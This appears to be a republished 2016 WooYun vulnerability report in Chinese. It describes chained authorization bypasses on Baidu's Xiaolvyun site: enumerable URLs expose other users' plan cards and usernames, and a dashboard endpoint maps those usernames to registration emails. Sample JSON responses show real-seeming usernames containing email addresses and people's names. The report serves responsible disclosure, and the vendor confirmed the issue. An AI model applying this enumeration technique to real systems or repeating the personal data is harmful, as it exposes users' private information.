百度某分站多处越权进一步获取该站注册用户信息

2017年4月16日08:33:07评论359 views字数 215阅读0分43秒阅读模式

摘要

2016-04-03：细节已通知厂商并且等待厂商处理中
2016-04-06：厂商已经确认，细节仅向厂商公开
2016-04-16：细节向核心白帽子及相关领域专家公开
2016-04-26：细节向普通白帽子公开
2016-05-06：细节向实习白帽子公开
2016-05-21：细节向公众公开

漏洞概要关注数(29) 关注此漏洞

缺陷编号： WooYun-2016-191930

漏洞标题：百度某分站多处越权进一步获取该站注册用户信息

漏洞作者： getshell1993

提交时间： 2016-04-03 13:00

公开时间： 2016-05-21 17:30

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank： 12

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

3人收藏

漏洞详情

披露状态：

简要描述：

多个越权组合

详细说明：

百度效率云

https://xiaolvyun.baidu.com/

这系统越权超级多，例如

越权查看他人计划卡片

https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/1122/edit?_=1459597042687

https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/2155/edit?_=1459597042687

https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/2159/edit?_=1459597042687

https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/1076/edit?_=1459597042687

https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/2157/edit?_=1459597042687

…………

接着发现有一处可以越权查看用户注册邮箱，前提得知道注册用户名

https://xiaolvyun.baidu.com/portal/member/dashboard?enterpriseName=test

于是结合一处泄露用户名的越权就可以批量获取整站用户信息了

https://xiaolvyun.baidu.com/abc123/icafe/issue/1/showHierarchy?_=1459598259235

遍历这个id即可/issue/*/获取到整站用户名

再用用户名获取到他的注册邮箱，以及组内成员邮箱

https://xiaolvyun.baidu.com/portal/member/dashboard?enterpriseName=iKafe

漏洞证明：

挑前五个id用户名证明一下，有些一个用户名组内对应了大量账号。

code 区域

{"status":"OK","message":"操作成功！","data":{"memberCount":4,"inviteCount":0,"users":[{"id":19,"name":"dongshuwang_baidu.com_ikafe","cnname":"董树旺","email":"","mobile":"","enterpriseId":2,"enterpriseName":"ikafe","enterpriseCnname":"爱咖啡","certificate":null}]}}
 {"status":"OK","message":"操作成功！","data":{"memberCount":24,"inviteCount":0,"users":[{"id":1,"name":"lihui24_baidu.com_baidu","cnname":"李辉","email":"","mobile":"","enterpriseId":1,"enterpriseName":"baidu","enterpriseCnname":"baidu","certificate":null}]}}
 {"status":"OK","message":"操作成功！","data":{"memberCount":4,"inviteCount":0,"users":[{"id":26,"name":"xuxiaoqiang_baidu.com_justin","cnname":"Justin","email":"","mobile":"","enterpriseId":4,"enterpriseName":"justin","enterpriseCnname":"justin","certificate":null}]}}
 {"status":"OK","message":"操作成功！","data":{"memberCount":1,"inviteCount":0,"users":[{"id":28,"name":"bestwangguan_hotmail.com_wangguan","cnname":"王冠","email":"","mobile":"","enterpriseId":5,"enterpriseName":"wangguan","enterpriseCnname":"王冠","certificate":null}]}}
 {"status":"OK","message":"操作成功！","data":{"memberCount":9,"inviteCount":3,"users":[{"id":30,"name":"shy2850_163.com_javascript","cnname":"时扬扬","email":"","mobile":"","enterpriseId":6,"enterpriseName":"javascript","enterpriseCnname":"javascript","certificate":null}]}}

修复方案：

整站做好权限控制

版权声明：转载请注明来源 getshell1993@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：17

确认时间：2016-04-06 17:22

厂商回复：

感谢您关注百度安全!

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-03 13:24 | 坏男孩-A_A ( 实习白帽子 | 还没有发布任何漏洞 | 膜拜学习中)

2

= =

1# 回复此人
2016-04-06 09:54 | zowie ( 实习白帽子 | Rank:84 漏洞数:13 | Z先生)

1

前排瓜子饮料 ps:不提BSRC是因为分低吗

2# 回复此人
2016-05-21 21:14 | Tony大耳机 ( 路人 | Rank:1 漏洞数:1 | 自己YY)

0

不错不错

3# 回复此人

漏洞概要 关注数(29) 关注此漏洞

缺陷编号： WooYun-2016-191930

漏洞标题： 百度某分站多处越权进一步获取该站注册用户信息

相关厂商： 百度

漏洞作者： getshell1993

提交时间： 2016-04-03 13:00

公开时间： 2016-05-21 17:30

漏洞类型： 未授权访问/权限绕过

危害等级： 高

自评Rank： 12

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

3人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 getshell1993@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(29) 关注此漏洞

漏洞标题：百度某分站多处越权进一步获取该站注册用户信息

相关厂商：百度

漏洞类型：未授权访问/权限绕过

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分